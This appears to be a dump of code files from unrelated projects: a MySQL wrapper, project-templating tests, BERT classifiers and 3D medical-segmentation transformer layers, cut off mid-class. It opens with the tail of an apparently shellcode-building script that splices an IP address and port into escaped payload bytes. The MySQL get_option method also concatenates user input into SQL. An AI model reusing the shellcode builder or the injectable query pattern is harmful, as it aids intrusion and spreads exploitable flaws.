shellcode_ip = "\\x" + ip_str[0] + ip_str[1] + "\\x" + ip_str[2] + ip_str[3] + "\\x" + ip_str[4] + ip_str[5] + "\\x" + ip_str[6] + ip_str[7] # print ip_str #print "DEBUG IP " + shellcode_ip #print "DEBUG PORT " + shellcode_port print shellcode_start + shellcode_ip + shellcode_middle + shellcode_port + shellcode_end ```
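The script above builds the escaped bytes by slicing zero-padded hex strings; `socket.inet_aton` and `struct.pack` give the same network-order bytes more directly. A Python 3 sketch of the equivalent conversion (the script itself is Python 2):

```python
import socket
import struct

def ip_port_to_escaped(ip, port):
    """Return \\x-escaped, network-order byte strings for an IPv4/port pair."""
    ip_bytes = socket.inet_aton(ip)       # 4 bytes, big-endian
    port_bytes = struct.pack(">H", port)  # 2 bytes, big-endian
    def escape(bs):
        return "".join("\\x%02x" % b for b in bs)
    return escape(ip_bytes), escape(port_bytes)

print(ip_port_to_escaped("127.1.1.1", 1234))
# ('\\x7f\\x01\\x01\\x01', '\\x04\\xd2')
```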
{ "source": "91-jinrong/-91_monitor", "score": 3 }
#### File: python/modules/mysql_server.py
```python
import MySQLdb


class MySQL:
    def __init__(self, host, port, user, passwd, dbname, timeout, charset):
        self.host = host
        self.port = port
        self.user = user
        self.passwd = passwd
        self.dbname = dbname
        self.timeout = timeout
        self.charset = charset

    def db_connect(self):
        connect = MySQLdb.connect(host=self.host, user=self.user, passwd=self.passwd,
                                  port=int(self.port), connect_timeout=int(self.timeout),
                                  charset=self.charset)
        return connect

    def execute(self, sql, param):
        conn = self.db_connect()
        conn.select_db(self.dbname)
        cursor = conn.cursor()
        if param != '':
            cursor.execute(sql, param)
        else:
            cursor.execute(sql)
        conn.commit()
        cursor.close()
        conn.close()

    def query(self, sql):
        conn = self.db_connect()
        conn.select_db(self.dbname)
        cursor = conn.cursor()
        count = cursor.execute(sql)
        if count == 0:
            result = 0
        else:
            result = cursor.fetchall()
        cursor.close()
        conn.close()
        return result

    def get_option(self, key):
        conn = self.db_connect()
        conn.select_db(self.dbname)
        cursor = conn.cursor()
        sql = "select value from options where name='" + key + "'"
        count = cursor.execute(sql)
        if count == 0:
            result = None
        else:
            result = cursor.fetchone()[0]
        cursor.close()
        conn.close()
        return result
```
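A usage sketch for the wrapper above (with the constructor fixed to `__init__`), assuming a reachable MySQL server with an `options(name, value)` table; host and credentials are placeholders:

```python
# Hypothetical connection parameters.
db = MySQL("127.0.0.1", 3306, "monitor", "secret", "monitor_db", 5, "utf8")

rows = db.query("select version()")
db.execute("insert into options(name, value) values(%s, %s)", ("interval", "60"))
print(db.get_option("interval"))
```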
{ "source": "91nunocosta/cookiecutterizer", "score": 3 }
#### File: cookiecutterizer/tests/helpers.py
```python
import shutil
import textwrap
from pathlib import Path
from typing import Optional


def create_text_file(directory: Path, file_name: str, content: str) -> Path:
    if not directory.exists():
        directory.mkdir(parents=True)
    path = directory / file_name
    with path.open("w") as text_file:
        text_file.write(textwrap.dedent(content))
    return path


def create_binary_file(directory: Path, file_name: str) -> Path:
    if not directory.exists():
        directory.mkdir(parents=True)
    path = directory / file_name
    shutil.copy(Path(__file__).parent / "data" / "bin", path)
    return path


# pylint: disable=unsubscriptable-object
def load_text_file(directory: Path, file_name: str) -> Optional[str]:
    path = directory / file_name
    if not path.exists():
        return None
    with path.open("r") as text_file:
        return text_file.read()
```
#### File: cookiecutterizer/tests/test_cookiecutterizer.py
```python
import textwrap
from pathlib import Path

from cookiecutterizer import create_file, target_files
from tests.helpers import create_binary_file, create_text_file, load_text_file


def create_empty_file(path: Path):
    with path.open("w"):
        pass


def test_target_files(tmp_path):
    """Test function."""
    destination = tmp_path / "destination"
    seed_project = tmp_path / "project"
    seed_project.mkdir()
    (seed_project / "dir1").mkdir()
    (seed_project / "dir2").mkdir()
    create_empty_file(seed_project / "file")
    (seed_project / "dir2" / "dir1").mkdir()
    (seed_project / "dir2" / "dir2").mkdir()
    create_empty_file(seed_project / "dir2" / "file")
    result = list(target_files(seed_project, {}, destination))
    assert len(result) == 7
    assert set(result) == {
        (seed_project, destination / "project"),
        (seed_project / "dir1", destination / "project" / "dir1"),
        (seed_project / "dir2", destination / "project" / "dir2"),
        (seed_project / "file", destination / "project" / "file"),
        (seed_project / "dir2" / "dir1", destination / "project" / "dir2" / "dir1"),
        (seed_project / "dir2" / "dir2", destination / "project" / "dir2" / "dir2"),
        (seed_project / "dir2" / "file", destination / "project" / "dir2" / "file"),
    }


def test_target_files_with_replacement(tmp_path):
    """Test function."""
    destination = tmp_path / "destination"
    seed_project = tmp_path / "project"
    seed_project.mkdir()
    (seed_project / "dir1").mkdir()
    (seed_project / "dir2").mkdir()
    create_empty_file(seed_project / "file")
    (seed_project / "dir2" / "dir1").mkdir()
    (seed_project / "dir2" / "dir2").mkdir()
    create_empty_file(seed_project / "dir2" / "file")
    result = list(
        target_files(seed_project, {"dir": "directory", "file": "f"}, destination)
    )
    assert len(result) == 7
    assert set(result) == {
        (seed_project, destination / "project"),
        (seed_project / "dir1", destination / "project" / "directory1"),
        (seed_project / "dir2", destination / "project" / "directory2"),
        (seed_project / "file", destination / "project" / "f"),
        (
            seed_project / "dir2" / "dir1",
            destination / "project" / "directory2" / "directory1",
        ),
        (
            seed_project / "dir2" / "dir2",
            destination / "project" / "directory2" / "directory2",
        ),
        (seed_project / "dir2" / "file", destination / "project" / "directory2" / "f"),
    }


def test_create_file_with_empty_substitutions(tmp_path):
    """Test creating file from seed, applying substitutions."""
    seed_file = create_text_file(
        tmp_path,
        "seed.txt",
        """
        line1
        line2
        ...
        linen
        """,
    )
    create_file(seed_file, {}, tmp_path / "target.txt")
    assert (tmp_path / "target.txt").exists()
    assert load_text_file(tmp_path, "target.txt") == textwrap.dedent(
        """
        line1
        line2
        ...
        linen
        """
    )


def test_create_file_with_substitutions(tmp_path):
    """Test creating file from seed, applying substitutions."""
    seed_file = create_text_file(
        tmp_path,
        "seed.txt",
        """
        line1
        line2
        ...
        linen
        """,
    )
    create_file(seed_file, {"line": "enil"}, tmp_path / "target.txt")
    assert (tmp_path / "target.txt").exists()
    assert load_text_file(tmp_path, "target.txt") == textwrap.dedent(
        """
        enil1
        enil2
        ...
        eniln
        """
    )


def test_create_binary_file(tmp_path):
    """Test creating file from binary file seed."""
    seed_file = create_binary_file(
        tmp_path,
        "seed",
    )
    create_file(seed_file, {"line": "enil"}, tmp_path / "target")
    assert not (tmp_path / "target").exists()
```
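The tests above pin down `create_file`'s contract: text seeds are copied with every substitution applied, and binary seeds produce no target at all. A minimal sketch consistent with those tests (not the package's actual implementation):

```python
from pathlib import Path

def create_file_sketch(seed: Path, substitutions: dict, target: Path) -> None:
    """Copy seed to target applying substitutions; skip binary seeds."""
    try:
        text = seed.read_text()
    except UnicodeDecodeError:
        # Assumed binary seed (not valid UTF-8): create no target,
        # matching test_create_binary_file.
        return
    for old, new in substitutions.items():
        text = text.replace(old, new)
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_text(text)
```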
{ "source": "91nunocosta/literature", "score": 2 }
#### File: literature/katapy/precommit.py ```python import invoke @invoke.task def run(c): """Run pre-commit on all files.""" c.run("pre-commit run --all-files", pty=True) ```
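Presumably this task is exposed through an Invoke namespace; a sketch of how such a collection is typically wired up (file name and task name are assumptions):

```python
# tasks.py
from invoke import Collection

from katapy import precommit

ns = Collection()
ns.add_task(precommit.run, name="precommit")

# Assumed shell usage:
#   invoke precommit
```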
{ "source": "91nunocosta/prototype-python-library", "score": 4 }
#### File: prototype-python-library/prototype_python_library/__init__.py ```python __version__ = "0.8.0" def fib(n: int) -> int: """Compute an element in the fibonacci sequence. >>> fib(0) 0 Args: n (int): the position in the sequence. Returns: The nth element in the fibonacci sequence. """ if n == 0: return 0 if n == 1: return 1 return fib(n - 1) + fib(n - 2) ```
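The doubly recursive `fib` above is exponential in `n`; a memoized variant keeps the same recurrence at linear cost (a sketch, not part of the package):

```python
from functools import lru_cache

@lru_cache(maxsize=None)
def fib_cached(n: int) -> int:
    """Same recurrence as fib(), but each value is computed once."""
    if n < 2:
        return n
    return fib_cached(n - 1) + fib_cached(n - 2)

assert fib_cached(10) == 55
```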
{ "source": "920232796/bert_seq2seq", "score": 3 }
#### File: bert_seq2seq/bert_seq2seq/bert_cls_classifier.py
```python
import torch
import torch.nn as nn
from bert_seq2seq.tokenizer import Tokenizer
from bert_seq2seq.basic_bert import BasicBert

class BertClsClassifier(BasicBert):
    """BERT with a linear head on the [CLS] token for sequence classification."""
    def __init__(self, word2ix, target_size, model_name="roberta"):
        super(BertClsClassifier, self).__init__(word2ix=word2ix, model_name=model_name)
        self.target_size = target_size
        self.final_dense = nn.Linear(self.config.hidden_size, self.target_size)

    def compute_loss(self, predictions, labels):
        """Compute the classification loss.
        predictions: (batch_size, target_size)
        """
        predictions = predictions.view(-1, self.target_size)
        labels = labels.view(-1)
        loss = nn.CrossEntropyLoss(reduction="mean")
        return loss(predictions, labels)

    def forward(self, text, position_enc=None, labels=None, use_layer_num=-1):
        if use_layer_num != -1:
            if use_layer_num < 0 or use_layer_num > 7:  # out of range
                raise Exception("Invalid layer index: this BERT base model has 8 layers, so only 0-7 are allowed; the default -1 takes the last layer.")
        text = text.to(self.device)
        if position_enc is not None:
            position_enc = position_enc.to(self.device)
        if labels is not None:
            labels = labels.to(self.device)
        enc_layers, _ = self.bert(text, output_all_encoded_layers=True)
        sequence_out = enc_layers[use_layer_num]
        cls_token = sequence_out[:, 0]  # take the [CLS] vector for classification
        predictions = self.final_dense(cls_token)
        if labels is not None:
            # compute loss
            loss = self.compute_loss(predictions, labels)
            return predictions, loss
        else:
            return predictions
```
#### File: bert_seq2seq/bert_seq2seq/bert_seq_labeling_crf.py
```python
import torch
import torch.nn as nn
from bert_seq2seq.tokenizer import Tokenizer
from bert_seq2seq.model.crf import CRFLayer
from bert_seq2seq.basic_bert import BasicBert

class BertSeqLabelingCRF(BasicBert):
    """BERT for sequence labeling with a CRF output layer."""
    def __init__(self, word2ix, target_size, model_name="roberta"):
        super(BertSeqLabelingCRF, self).__init__(word2ix=word2ix, model_name=model_name)
        self.target_size = target_size
        self.final_dense = nn.Linear(self.config.hidden_size, self.target_size)
        self.crf_layer = CRFLayer(self.target_size)

    def compute_loss(self, predictions, labels):
        """Compute the CRF loss."""
        loss = self.crf_layer(predictions, labels, self.target_mask)
        return loss.mean()

    def forward(self, text, position_enc=None, labels=None, use_layer_num=-1):
        if use_layer_num != -1:
            if use_layer_num < 0 or use_layer_num > 7:  # out of range
                raise Exception("Invalid layer index: this BERT base model has 8 layers, so only 0-7 are allowed; the default -1 takes the last layer.")
        # compute the target mask
        self.target_mask = (text > 0).float().to(self.device)
        text = text.to(self.device)
        if position_enc is not None:
            position_enc = position_enc.to(self.device)
        if labels is not None:
            labels = labels.to(self.device)
        enc_layers, _ = self.bert(text, output_all_encoded_layers=True)
        sequence_out = enc_layers[use_layer_num]
        transform_out = self.transform(sequence_out)
        predictions = self.final_dense(transform_out)
        if labels is not None:
            # compute loss
            loss = self.compute_loss(predictions, labels)
            return predictions, loss
        else:
            return predictions
```
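A usage sketch for the CLS classifier above; it builds a randomly initialized model from a toy vocabulary, whereas real use would load the full BERT vocab and pretrained weights through the library's own helpers:

```python
import torch

from bert_seq2seq.bert_cls_classifier import BertClsClassifier

# Toy vocabulary; ids must stay inside the vocab, which sizes the embeddings.
word2ix = {"[PAD]": 0, "[CLS]": 1, "[SEP]": 2}

model = BertClsClassifier(word2ix, target_size=3, model_name="roberta")
model.eval()

token_ids = torch.tensor([[1, 2]])  # one toy sequence: [CLS] [SEP]
labels = torch.tensor([0])
with torch.no_grad():
    predictions, loss = model(token_ids, labels=labels)
print(predictions.shape)  # (1, 3)
```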
{ "source": "920232796/MedicalSeg", "score": 3 }
#### File: medical_seg/loss/uncertainty_loss.py ```python import torch class UncertaintyLoss: def __init__(self): pass def __call__(self, pred, pred_uncer, label): pass pred_uncer = torch.sigmoid(pred_uncer) pred = pred.argmax(dim=1) true_pos = (pred == label).float() loss = pred_uncer * true_pos - pred_uncer * (1 - true_pos) return loss.mean() ``` #### File: networks/layers/fusion_transformer.py ```python from os import path from time import time import numpy as np import math from einops import rearrange import torch.nn as nn import torch import ml_collections from medical_seg.networks.layers.multi_attention import MultiAttentionTransformer def get_config(in_channels=1, hidden_size=128, img_size=(1, 1, 1), patch_size=(1, 1, 1), mlp_dim=256, num_heads=8): config = ml_collections.ConfigDict() config.hidden_size = hidden_size config.in_channels = in_channels config.transformer = ml_collections.ConfigDict() config.transformer.mlp_dim = mlp_dim config.transformer.num_heads = num_heads config.transformer.num_layers = 1 config.transformer.attention_dropout_rate = 0.0 config.transformer.dropout_rate = 0.5 config.patch_size = patch_size config.img_size = img_size return config def swish(x): return x * torch.sigmoid(x) ACT2FN = {"gelu": torch.nn.functional.gelu, "relu": torch.nn.functional.relu, "swish": swish} class Attention(nn.Module): def __init__(self, config): super(Attention, self).__init__() self.num_attention_heads = config.transformer["num_heads"] self.attention_head_size = int(config.hidden_size / self.num_attention_heads) self.all_head_size = self.num_attention_heads * self.attention_head_size self.query = nn.Linear(config.hidden_size, self.all_head_size) self.key = nn.Linear(config.hidden_size, self.all_head_size) self.value = nn.Linear(config.hidden_size, self.all_head_size) self.out = nn.Linear(config.hidden_size, config.hidden_size) self.attn_dropout = nn.Dropout(config.transformer["attention_dropout_rate"]) self.proj_dropout = nn.Dropout(config.transformer["attention_dropout_rate"]) self.softmax = nn.Softmax(dim=-1) def transpose_for_scores(self, x): new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size) x = x.view(*new_x_shape) return x.permute(0, 2, 1, 3) def forward(self, hidden_states): mixed_query_layer = self.query(hidden_states) mixed_key_layer = self.key(hidden_states) mixed_value_layer = self.value(hidden_states) query_layer = self.transpose_for_scores(mixed_query_layer) key_layer = self.transpose_for_scores(mixed_key_layer) value_layer = self.transpose_for_scores(mixed_value_layer) attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2)) attention_scores = attention_scores / math.sqrt(self.attention_head_size) attention_probs = self.softmax(attention_scores) attention_probs = self.attn_dropout(attention_probs) context_layer = torch.matmul(attention_probs, value_layer) context_layer = context_layer.permute(0, 2, 1, 3).contiguous() new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,) context_layer = context_layer.view(*new_context_layer_shape) attention_output = self.out(context_layer) attention_output = self.proj_dropout(attention_output) return attention_output class Mlp(nn.Module): def __init__(self, config): super(Mlp, self).__init__() self.fc1 = nn.Linear(config.hidden_size, config.transformer["mlp_dim"]) self.fc2 = nn.Linear(config.transformer["mlp_dim"], config.hidden_size) self.act_fn = ACT2FN["gelu"] self.dropout = nn.Dropout(config.transformer["dropout_rate"]) def forward(self, x): x = 
self.fc1(x) x = self.act_fn(x) x = self.dropout(x) x = self.fc2(x) x = self.dropout(x) return x class Embeddings(nn.Module): """Construct the embeddings from patch, position embeddings. """ def __init__(self, config): super(Embeddings, self).__init__() self.config = config img_size = config.img_size in_channels = config.in_channels patch_size = config["patch_size"] n_patches = (img_size[0] // patch_size[0]) * (img_size[1] // patch_size[1]) * (img_size[2] // patch_size[2]) self.patch_embeddings = nn.Conv3d(in_channels=in_channels, out_channels=config.hidden_size, kernel_size=patch_size, stride=patch_size) self.position_embeddings = nn.Parameter(torch.zeros(1, n_patches, config.hidden_size)) self.dropout = nn.Dropout(config.transformer["dropout_rate"]) def forward(self, x): x = self.patch_embeddings(x) # (B, hidden. n_patches^(1/2), n_patches^(1/2)) x = x.flatten(2) x = x.transpose(-1, -2) # (B, n_patches, hidden) embeddings = x + self.position_embeddings embeddings = self.dropout(embeddings) return embeddings class BlockMulti(nn.Module): def __init__(self, config): super(BlockMulti, self).__init__() self.config = config self.hidden_size = config.hidden_size self.attention_norm = nn.LayerNorm(config.hidden_size, eps=1e-6) self.ffn_norm = nn.LayerNorm(config.hidden_size, eps=1e-6) self.ffn = Mlp(config) self.attn = Attention(config) def forward(self, x): h = x x = self.attention_norm(x) x = self.attn(x) x = x + h h = x x = self.ffn_norm(x) x = self.ffn(x) x = x + h return x class SelfTransformerLayer(nn.Module): def __init__(self, in_channels, out_channels, patch_size, img_size, mlp_size=256, num_layers=1): super().__init__() self.config = get_config(in_channels=in_channels, hidden_size=out_channels, patch_size=patch_size, img_size=img_size, mlp_dim=mlp_size) self.block_list = nn.ModuleList([BlockMulti(self.config) for i in range(num_layers)]) self.embeddings = Embeddings(self.config) def forward(self, x, encoder=False): input_shape = self.config.img_size batch_size = x.shape[0] x = self.embeddings(x) for l in self.block_list: x = l(x) if encoder: return x x = x.transpose(-1, -2) out_size = (input_shape[0] // self.config.patch_size[0], input_shape[1] // self.config.patch_size[1], input_shape[2] // self.config.patch_size[2],) x = x.view((batch_size, self.config.hidden_size, out_size[0], out_size[1], out_size[2])) return x class AttentionCrossModal(nn.Module): def __init__(self, config): super(AttentionCrossModal, self).__init__() self.num_attention_heads = config.transformer["num_heads"] self.attention_head_size = int(config.hidden_size / self.num_attention_heads) self.all_head_size = self.num_attention_heads * self.attention_head_size self.query = nn.Linear(config.hidden_size, self.all_head_size) self.key = nn.Linear(config.hidden_size, self.all_head_size) self.value = nn.Linear(config.hidden_size, self.all_head_size) self.out = nn.Linear(config.hidden_size, config.hidden_size) self.attn_dropout = nn.Dropout(config.transformer["attention_dropout_rate"]) self.proj_dropout = nn.Dropout(config.transformer["attention_dropout_rate"]) self.softmax = nn.Softmax(dim=-1) def transpose_for_scores(self, x): new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size) x = x.view(*new_x_shape) return x.permute(0, 2, 1, 3) def forward(self, hidden_states, kv): ## kv 是别的模态的特征。 mixed_query_layer = self.query(hidden_states) mixed_key_layer = self.key(kv) mixed_value_layer = self.value(kv) query_layer = self.transpose_for_scores(mixed_query_layer) key_layer = 
self.transpose_for_scores(mixed_key_layer) value_layer = self.transpose_for_scores(mixed_value_layer) attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2)) attention_scores = attention_scores / math.sqrt(self.attention_head_size) attention_probs = self.softmax(attention_scores) attention_probs = self.attn_dropout(attention_probs) context_layer = torch.matmul(attention_probs, value_layer) context_layer = context_layer.permute(0, 2, 1, 3).contiguous() new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,) context_layer = context_layer.view(*new_context_layer_shape) attention_output = self.out(context_layer) attention_output = self.proj_dropout(attention_output) return attention_output class BlockCrossAtt(nn.Module): ## 跨模态的attention def __init__(self, config): super().__init__() self.hidden_size = config.hidden_size self.attention_norm = nn.LayerNorm(self.hidden_size, eps=1e-6) self.attention_norm_cross = nn.LayerNorm(self.hidden_size, eps=1e-6) self.ffn_norm = nn.LayerNorm(self.hidden_size, eps=1e-6) self.ffn = Mlp(config) self.attn_cross = AttentionCrossModal(config) def forward(self, q, kv): # q是其他模态特征。 h = q x = self.attn_cross(q, kv) x = x + h x = self.attention_norm_cross(x) h = x x = self.ffn(x) x = x + h x = self.ffn_norm(x) return x class CrossTransLayer(nn.Module): def __init__(self, model_num, in_channels, hidden_size, patch_size, img_size, mlp_size=256, token_mixer_size=32): super().__init__() self.embeddings = nn.ModuleList([]) self.config = get_config(in_channels=in_channels, hidden_size=hidden_size, patch_size=patch_size, img_size=img_size, mlp_dim=mlp_size) self.model_num = model_num patch_num = (img_size[0] // patch_size[0]) * (img_size[1] // patch_size[1]) * (img_size[2] // patch_size[2]) self.token_mixer = nn.Linear(patch_num, token_mixer_size) for i in range(model_num): self.embeddings.append(Embeddings(self.config)) self.cross_attention = BlockCrossAtt(config=self.config) def forward(self, q, kv): pass embed_x = [] for i in range(self.model_num): x = self.embeddings[i](kv[:, i]) x = x.transpose(-1, -2) x = self.token_mixer(x) x = x.transpose(-1, -2) embed_x.append(x) embed_x = torch.cat(embed_x, dim=1) # print(f"embed x shape is {embed_x.shape}") corss_out = self.cross_attention(q, embed_x) return corss_out class FusionSelfCrossTrans(nn.Module): def __init__(self, model_num, in_channels, hidden_size, patch_size, img_size, mlp_size=256, self_num_layer=2, window_size=(2, 4, 4), token_mixer_size=32): super().__init__() self.img_size = img_size self.patch_size = patch_size self.hidden_size = hidden_size self.self_block = MultiAttentionTransformer(in_channels=model_num*in_channels, out_channels=hidden_size, patch_size=patch_size, img_size=img_size, mlp_size=mlp_size, num_layers=self_num_layer, window_size=window_size) # self.self_block = SelfTransformerLayer(in_channels=model_num*in_channels, # out_channels=hidden_size, # patch_size=patch_size, # img_size=img_size, mlp_size=mlp_size, # num_layers=self_num_layer) self.cross_trans = CrossTransLayer(model_num=model_num, in_channels=in_channels, hidden_size=hidden_size, patch_size=patch_size, img_size=img_size, mlp_size=mlp_size, token_mixer_size=token_mixer_size) def forward(self, x): ## cross attention后的shape 跟 q 一致, 所以q是self-trans-out ## x: (batch , model_num , hidden_size, d, w, h) self_trans_in = rearrange(x, "b m f d w h -> b (m f) d w h") # self_trans_out = self.self_block(self_trans_in, encoder=True) self_trans_out = self.self_block(self_trans_in) ## self_trans_out 经过multi 
attention trans以后,尺寸为 (batch, hidden_size, d, w, h) self_trans_out = rearrange(self_trans_out, "b c d w h -> b (d w h) c") input_shape = self.img_size batch_size = x.shape[0] cross_trans_out = self.cross_trans(self_trans_out, x) x = cross_trans_out x = x.transpose(-1, -2) out_size = (input_shape[0] // self.patch_size[0], input_shape[1] // self.patch_size[1], input_shape[2] // self.patch_size[2],) x = x.view((batch_size, self.hidden_size, out_size[0], out_size[1], out_size[2])) return x ``` #### File: layers/temp_save/multi_attention copy.py ```python import numpy as np import math from torch import nn, einsum from einops import rearrange, repeat import torch import ml_collections from typing import Union from medical_seg.networks.nets.co_unet import UpCat def get_config(in_channels=1, hidden_size=128, img_size=(1, 1, 1), patch_size=(1, 1, 1), mlp_dim=256, num_heads=8, window_size=(8, 8, 8)): config = ml_collections.ConfigDict() config.hidden_size = hidden_size config.in_channels = in_channels config.transformer = ml_collections.ConfigDict() config.transformer.mlp_dim = mlp_dim config.transformer.num_heads = num_heads config.transformer.num_layers = 1 config.transformer.attention_dropout_rate = 0.0 config.transformer.dropout_rate = 0.1 config.patch_size = patch_size config.img_size = img_size config.window_size = window_size config.num_heads = num_heads config.window_size = window_size return config def swish(x): return x * torch.sigmoid(x) ACT2FN = {"gelu": torch.nn.functional.gelu, "relu": torch.nn.functional.relu, "swish": swish} class Attention(nn.Module): def __init__(self, config): super(Attention, self).__init__() self.num_attention_heads = config.transformer["num_heads"] self.attention_head_size = int(config.hidden_size / self.num_attention_heads) self.all_head_size = self.num_attention_heads * self.attention_head_size self.query = nn.Linear(config.hidden_size, self.all_head_size) self.key = nn.Linear(config.hidden_size, self.all_head_size) self.value = nn.Linear(config.hidden_size, self.all_head_size) self.out = nn.Linear(config.hidden_size, config.hidden_size) self.attn_dropout = nn.Dropout(config.transformer["attention_dropout_rate"]) self.proj_dropout = nn.Dropout(config.transformer["attention_dropout_rate"]) self.softmax = nn.Softmax(dim=-1) def transpose_for_scores(self, x): new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size) x = x.view(*new_x_shape) return x.permute(0, 2, 1, 3) def forward(self, hidden_states, attention=False): mixed_query_layer = self.query(hidden_states) mixed_key_layer = self.key(hidden_states) mixed_value_layer = self.value(hidden_states) query_layer = self.transpose_for_scores(mixed_query_layer) key_layer = self.transpose_for_scores(mixed_key_layer) value_layer = self.transpose_for_scores(mixed_value_layer) attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2)) attention_scores = attention_scores / math.sqrt(self.attention_head_size) attention_probs = self.softmax(attention_scores) attention_probs = self.attn_dropout(attention_probs) context_layer = torch.matmul(attention_probs, value_layer) context_layer = context_layer.permute(0, 2, 1, 3).contiguous() new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,) context_layer = context_layer.view(*new_context_layer_shape) attention_output = self.out(context_layer) attention_output = self.proj_dropout(attention_output) if attention: return attention_output, attention_probs return attention_output def get_relative_distances(window_size): 
indices = torch.tensor(np.array([[x, y, z] for x in range(window_size[0]) for y in range(window_size[1]) for z in range(window_size[2])])) distances = indices[None, :, :] - indices[:, None, :] return distances class WindowAttention(nn.Module): def __init__(self, dim, heads, head_dim, window_size, relative_pos_embedding): super().__init__() inner_dim = head_dim * heads self.heads = heads self.scale = head_dim ** -0.5 self.window_size = window_size self.relative_pos_embedding = relative_pos_embedding self.to_qkv = nn.Linear(dim, inner_dim * 3, bias=False) if self.relative_pos_embedding: self.relative_indices = get_relative_distances(window_size) min_indice = self.relative_indices.min() self.relative_indices += (-min_indice) max_indice = self.relative_indices.max().item() self.pos_embedding = nn.Parameter(torch.randn(max_indice + 1, max_indice + 1, max_indice + 1)) else: self.pos_embedding = nn.Parameter(torch.randn(window_size ** 2, window_size ** 2)) self.to_out = nn.Linear(inner_dim, dim) def forward(self, x): b, n_h, n_w, n_d, _, h = *x.shape, self.heads qkv = self.to_qkv(x).chunk(3, dim=-1) nw_h = n_h // self.window_size[0] nw_w = n_w // self.window_size[1] nw_d = n_d // self.window_size[2] ## h 为注意力头的个数 nw_h 为h(长)的维度上窗口个数 wh为窗口的长 nw_w同理 ## 如何去进行窗口内部的attention计算呢,其实就是设置成这个shape (b, 注意力头个数,窗口个数,窗口面积,hidden size) ## 这样就做到了在窗口面积内进行attention计算。 q, k, v = map( lambda t: rearrange(t, 'b (nw_h w_h) (nw_w w_w) (nw_d w_d) (h d) -> b h (nw_h nw_w nw_d) (w_h w_w w_d) d', h=h, w_h=self.window_size[0], w_w=self.window_size[1], w_d=self.window_size[2]), qkv) dots = einsum('b h w i d, b h w j d -> b h w i j', q, k) * self.scale # 注意力结果为 (b,注意力头个数, 窗口个数, 窗口长度,窗口宽度) 所以注意力表示的意思呢 就是每个窗口内互相的注意力大小 if self.relative_pos_embedding: dots += self.pos_embedding[self.relative_indices[:, :, 0], self.relative_indices[:, :, 1], self.relative_indices[:, :, 2]] else: dots += self.pos_embedding # if self.shifted: # dots[:, :, -nw_w:] += self.upper_lower_mask # dots[:, :, nw_w - 1::nw_w] += self.left_right_mask attn = dots.softmax(dim=-1) out = einsum('b h w i j, b h w j d -> b h w i d', attn, v) out = rearrange(out, 'b h (nw_h nw_w nw_d) (w_h w_w w_d) d -> b (nw_h w_h) (nw_w w_w) (nw_d w_d) (h d)', h=h, w_h=self.window_size[0], w_w=self.window_size[1], w_d = self.window_size[2], nw_h=nw_h, nw_w=nw_w, nw_d=nw_d) out = self.to_out(out) return out class MultiAttention(nn.Module): def __init__(self, config, is_position=False): super().__init__() self.config = config self.is_position = is_position self.v_embedding = Embeddings(config, types=1) self.h_embedding = Embeddings(config, types=2) self.window_embedding = Embeddings(config, types=0, is_window=True) self.v_attention = Attention(config) self.h_attention = Attention(config) self.window_attention = WindowAttention(config.hidden_size, config.num_heads, config.hidden_size // config.num_heads, config.window_size, relative_pos_embedding=True) if is_position: self.pos_embedding_1 = Postion_embedding(config, types=1) self.pos_embedding_2 = Postion_embedding(config, types=2) def forward(self, x): batch_size, hidden_size, D, W, H = x.shape x_1 = x.view(batch_size*D, hidden_size, W, H) x_2 = x.view(W*H*batch_size, hidden_size, D) x_3 = x.permute(0, 2, 3, 4, 1) x_1 = x_1.flatten(2) x_1 = x_1.transpose(-1, -2) # (B, n_patches, hidden) x_2 = x_2.flatten(2) x_2 = x_2.transpose(-1, -2) # (B, n_patches, hidden) if self.is_position: x_1 = self.pos_embedding_1(x_1) x_2 = self.pos_embedding_2(x_2) x_1 = self.v_attention(x_1) x_2 = self.h_attention(x_2) x_3 = self.window_attention(x_3) x_3 
class MultiAttention(nn.Module):
    def __init__(self, config, is_position=False):
        super().__init__()
        self.config = config
        self.is_position = is_position
        self.v_embedding = Embeddings(config, types=1)
        self.h_embedding = Embeddings(config, types=2)
        self.window_embedding = Embeddings(config, types=0, is_window=True)
        self.v_attention = Attention(config)
        self.h_attention = Attention(config)
        self.window_attention = WindowAttention(config.hidden_size, config.num_heads,
                                                config.hidden_size // config.num_heads,
                                                config.window_size, relative_pos_embedding=True)
        if is_position:
            self.pos_embedding_1 = Postion_embedding(config, types=1)
            self.pos_embedding_2 = Postion_embedding(config, types=2)

    def forward(self, x):
        batch_size, hidden_size, D, W, H = x.shape

        x_1 = x.view(batch_size*D, hidden_size, W, H)
        x_2 = x.view(W*H*batch_size, hidden_size, D)
        x_3 = x.permute(0, 2, 3, 4, 1)

        x_1 = x_1.flatten(2)
        x_1 = x_1.transpose(-1, -2)  # (B, n_patches, hidden)
        x_2 = x_2.flatten(2)
        x_2 = x_2.transpose(-1, -2)  # (B, n_patches, hidden)

        if self.is_position:
            x_1 = self.pos_embedding_1(x_1)
            x_2 = self.pos_embedding_2(x_2)

        x_1 = self.v_attention(x_1)
        x_2 = self.h_attention(x_2)
        x_3 = self.window_attention(x_3)

        x_3 = x_3.view(batch_size, D*W*H, hidden_size).contiguous()
        x_1 = x_1.view((-1, self.config.hidden_size, W, H)).contiguous()
        x_1 = x_1.view((batch_size, D*W*H, self.config.hidden_size))
        x_2 = x_2.view((-1, self.config.hidden_size, D)).contiguous()
        x_2 = x_2.view((batch_size, D*W*H, self.config.hidden_size))

        return x_1 + x_2 + x_3


class Mlp(nn.Module):
    def __init__(self, config):
        super(Mlp, self).__init__()
        self.fc1 = nn.Linear(config.hidden_size, config.transformer["mlp_dim"])
        self.fc2 = nn.Linear(config.transformer["mlp_dim"], config.hidden_size)
        self.act_fn = ACT2FN["gelu"]
        self.dropout = nn.Dropout(config.transformer["dropout_rate"])

    def forward(self, x):
        x = self.fc1(x)
        x = self.act_fn(x)
        x = self.dropout(x)
        x = self.fc2(x)
        x = self.dropout(x)
        return x


class Embeddings(nn.Module):
    """Construct the embeddings from patch, position embeddings.
    """
    def __init__(self, config, types=0, is_window=False):
